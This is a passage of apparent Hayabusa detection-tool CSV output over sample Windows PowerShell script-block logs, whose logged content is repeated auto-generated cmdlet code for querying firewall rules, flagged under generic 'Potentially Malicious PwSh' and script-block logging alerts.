[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance]",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:37.905 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] 
${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') }",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:37.905 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, 
[Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() 
$__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:37.905 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) 
$__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if 
($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 
'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = 